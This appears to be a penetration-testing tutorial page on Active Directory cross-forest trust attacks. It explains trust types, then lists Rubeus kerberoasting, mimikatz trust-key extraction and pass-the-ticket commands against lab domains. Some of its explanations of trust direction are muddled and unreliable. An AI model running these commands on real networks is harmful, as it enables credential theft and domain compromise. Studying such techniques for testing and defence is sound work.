Cross Forest Attacks

In Active Directory (AD), a trust is a connection between the authentication systems of two domains, allowing users from one domain to access resources in another. Trusts exist both within a single AD forest and between separate forests (cross-forest trusts). There are many ways to attack cross-forest trusts.

Types of Cross-Forest Trusts

  1. External Trust: Connects 2 separate domains in different hosts, that do not have a forest trust, and uses SID filtering to prevent SID History abuse.

  2. Forest Trust: Connects 2 entire entire AD forest allowing users from one forest to authenticate across all domains in the other forest. If Domain A trusts Forest X, then any user from Forest X can access any domain in Forest A.

One-Way Trust
Two-Way Trust

Direction of Access

Trusted → Trusting

Both ways (Bidirectional)

Who Can Access What?

Users in the trusted domain can access the trusting domain, but not vice versa.

Users from both domains/forests can access each other's resources.

Common Use Case

A parent company allows employees from a subsidiary to access shared resources, but not the other way around.

Common in large organizations where domains need to share resources freely.

Security Risk

Lower risk, as access is limited to one direction.

Higher risk, since a compromise in one domain/forest can affect the other.

In a nutshell

  • AD trusts allow users in different domains/forests to access resources.

  • External Trusts are more restrictive and use SID Filtering.

  • Forest Trusts are more flexible but riskier because they allow full authentication across forests.

  • One-Way Trusts allow access in only one direction, while Two-Way Trusts allow access in both directions.

  • Attackers can abuse trust relationships if security is not properly configured.

Kerberoasting targeting a Domain

.\Rubeus.exe kerberoast /domain:logistics.ad /user:holly

Trust Account Attack

In above example we see a one-way trust from Forest A to Forest B, the access works from A to B but not the other way around. To brake this rule we can perform a Trust Account Attack.

When a trust is created, a trust account (A$) is automatically created in Forest-B. This account is just a regular domain user in Forest-B. Attackers in Forest-A can steal the credentials of this trust then login to Forest-B bypassing one-way restriction.

# Enumerate
Get-ADTrust -Identity megacorp.ad  

# SharpHound domain
.\SharpHound.exe -c All -d megacorp.ad

# Extract Forest Trust Keys
.\mimikatz.exe "lsadump::trust /patch" exit

# Request ticket for logistics$
.\Rubeus.exe asktgt /user:logistics$ /domain:megacorp.ad /rc4:68e456d3a95cc748ac5a2eae679b9c91 /ptt

# Kerberoast
.\Rubeus.exe kerberoast /domain:megacorp.ad

# Or request a ticket
.\Rubeus.exe asktgt /user:white.beard /password:<SNIP> /domain:megacorp.ad /ptt  

# New PS Session
New-PSSession DC03.megacorp.ad

Last updated

Was this helpful?